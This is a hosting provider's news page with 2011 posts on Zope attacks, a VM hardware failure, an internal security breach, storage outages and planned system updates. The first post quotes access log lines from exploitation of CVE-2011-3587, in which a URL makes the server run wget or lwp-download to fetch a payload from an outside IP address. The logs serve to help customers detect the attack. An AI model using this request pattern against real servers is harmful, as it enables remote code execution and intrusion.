gocept.net [en]

Attacks against Zope installations

We see intensified attack activity against Zope installations since 2011-12-26. The activity focuses on automatically exploiting the vulnerability described in CVE-2011-3587, for which a patch is readily available.

Please ensure that all of your Zope installations contain the latest security patches, since gocept does not take responsibility for patching user applications.

Suspicious activity leaves traces in access log files that follow a pattern like:

211.191.168.XXX - - [26/Dec/2011:22:18:00 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
211.191.168.XXX - - [26/Dec/2011:22:18:01 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=lwp-download%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

Hardware failure of a VM server

On Monday, 2011-10-31 one of our VM servers died completely. This caused an unplanned outage for several customer VMs and our mail server mail.gocept.net. We were able to limit the total down times by migrating the affected VMs to other servers quickly.
It is unlikely that any data has been lost. Please excuse the service disruption.

The server started to decline network requests around 15:30 CET. Our stand-by support team was alerted immediatly. After we had come to the conclusion that we could not revive the hardware quickly, we began on 16:15 CET to move VMs to other Servers. Around 16:45 CET services have been functional again.

Security breach on an internal system on 2011-10-18

On Tuesday (2011-10-18) at 22:45 CEST an attacker managed to gain access to one of our internal systems running, among others, the external service monitoring, the Redmine project management tool, and an internal mailing list server. The compromised system is not automatically managed.

Customer VMs were not affected.

We needed to take the machine partially off the network between Wednesday (2011-10-19) 13:20 and 21:00 CEST to perform an analysis and fix security holes. The above mentioned services had only limited availability during this period. User-generated data has most likely not been compromised. We decided to take the machine back online to make the services available again as quickly as possible.

Nevertheless we will move the services to newly installed machines shortly and erase the compromised machine. We will review and improve our security practices to avoid similar incidents in the future.

Unplanned VM outage 2011-09-06 16:25-17:00 CEST

Unfortunately some VMs experienced an unplanned outage yesterday (2011-09-05) between 16:25 and 17:00 CEST as their root disks turned read-only.

To quickly recover from this state we forcedly shut down the VMs and rebooted the associated KVM server. The VMs recovered fine after this reboot.

Owners of affected VMs have been notified individually directly after the incident.

It appears that we have hit a bug in our iSCSI initialisation code that caused all VMs on this physical host to loose connectivity to their storage server.

The issue was triggered while we were bootstrapping a new virtual machine.

The bug is currently undergoing further analysis and replication in our development environment and will be fixed soon.

For the time being we have ceased to perform actions that trigger this bug and do not expect your VM to be affected from this again.

System updates between August 29th and September 2nd

We proudly announce that the pending system updates will be performed during the week of August 29th and September 2nd.

Stability issue resolved

The stability issue with our iSCSI storage server that required us to postpone the system update has been resolved. It was caused by an incompatibility between the iSCSI server software and Linux 2.6.39. We resolved the issue by selecting 2.6.38 as the new kernel version for this update instead.

Order of events

With the system update next week the order of the next events will be:

This week:

Announcement of general resource group maintenance settings by email
Announcement of specific maintenance windows for every VM by email

Next week:

Monday morning: update of infrastructure machines, watch for any deviations, fix of last minute-bugs if necessary, no downtime expected. If anything goes wrong this will be our chance to cancel any customer-affecting updates.
Monday evening: update of a representative set of machines including selected customer VMs.
Tuesday evening: initiate update on 20% of all machines
Wednesday evening: initiate update on 30% of all machines
Thursday evening: initiate update on the remaining machines
Saturday: reboot of all VM host machines

During the week we have also scheduled an early-morning and late-night shift of our support personnel that will keep an eye on the services during and after the system update and fix any issues arising or contact you in case of issues that we can not fix for you.

Please note that all VMs will be rebooted twice: once during their regular maintenance window to activate the new kernel and a second time on Saturday without a regular maintenance window due to the necessary restart of the KVM hosts.

Automatic maintenance scheduling

With the growing number of machines that we support in gocept.net and the ultimate goal of providing a transparent, flexible yet automated service we took your feedback from the last months and chose to implement a better mechanism to support maintenance activities than the existing "automatic reboot" scheduler that only paid attention to system load and did not communicate.

The new implementation allows any machine to queue "maintenance activities" like memory resizes, changes on the number of CPUs, kernel updates, or larger system updates. Depending on the settings of the resource group our central directory is then able to automatically schedule a window for those activities and notify the machine of the time that the activity should be performed at.

Every resource group now has settings for:

your technical contact email addresses
your preferred timezone
a daily interval that can be used for scheduling regular maintenance automatically
what period you need to be informed before any maintenance activity.

Every machine has an additional setting that controls whether this machine is allowed to automatically schedule new maintenance windows.

To introduce this feature you will first receive individual emails for each resource group that display the values we used to initialize this for you. After preparing the full roll-out schedule for next week, you will then receive emails about the windows that we schedule for each individual machine.

More swap for small VMs

All VMs now get at least 1GB of swap space. This will help smaller VMs that need to run the same system administration tools that stay in memory but get swapped out by the kernel regularly. This way you can make more effective use of the memory in smaller VMs without our system management getting in your way.

Multi-core VMs

Due to popular demand we are now introducing multi-core VMs: you can choose to run up to 12 cores per virtual machine.

However, we still recommend to use the multi-core feature wisely: dividing up your application over multiple smaller VMs has positive side effects like load-balancing and higher fault tolerance on the infrastructure level and it ultimately scales to many more cores. It also usually means the setup of each individual VM is much simpler, more testable, and thus more maintainable. Also remember: the operating system for VMs is still at 32-bit so you're limited to a total of 4GB of memory in the VM and 3GB per process.

We will charge 25 EUR per additional core per month.

Software updates

The package catalog has been updated and now includes, amongst others, Linux 2.6.38, Python 2.5.4, 2.6.6, 2.7.1 and 3.1.3. A more detailed list of package updates is shown in our official ChangeLog.

To perform the package updates faster then in the past we have now improved our binary host system for pre-compiling the packages in our development environment and then directly pushing them onto the data center mirrors. As we use a well-adjusted check-summing mechanism to ensure binary compatibility this ensures that the packages are already in the data center when the machines start updating.

CPU visibility

Do you wonder which CPU actually powers your VM? Running `uname -a` now shows the actual physical CPU identification instead of the generic `qemu virtual CPU`.

As we run a mixed environment that constantly get updated you might see different CPU numbers on different machines. If you think you could benefit from a better CPU then drop us a note and we'll see whether we have some free space on a system with more power.

New configuration schema for PostgreSQL 9

The PostgreSQL configuration schema has been adjusted by Gentoo to be more Unix-like and thus locate the configuration files in /etc/postgresql-9.0 instead of /srv/postgresql/9.0/data.

More documentation

In case you haven't noticed: we have also silently been updating our gocept.net documentation to give a better overview of our architecture, help you get started and explain the typical tasks in our environment.

We're very excited putting those improvements into good use and hope that they will further improve your experience of our hosting services.

Your gocept.net system administrators

System updates delayed

Unfortunately the preparations of the planned system updates next week have uncovered a stability issue in the storage system that might endanger the availability and reliability of your services.

Therefore we have decided to delay the planned update as long as necessary to provide a reliable solution.

We would like to re-schedule the update as soon as possible but can not give a specific date at the current time. However, we will inform you at least one week upfront, giving a detailed schedule.

We apologize for any inconvenience,
Your gocept.net system administrators

System updates August 15th–19th

We'd like to pre-announce a comprehensive system update of our hosting infrastructure in the week of August 15th–19th.

The update will require some downtime to all of our services. Details about the specific downtimes will be published separately.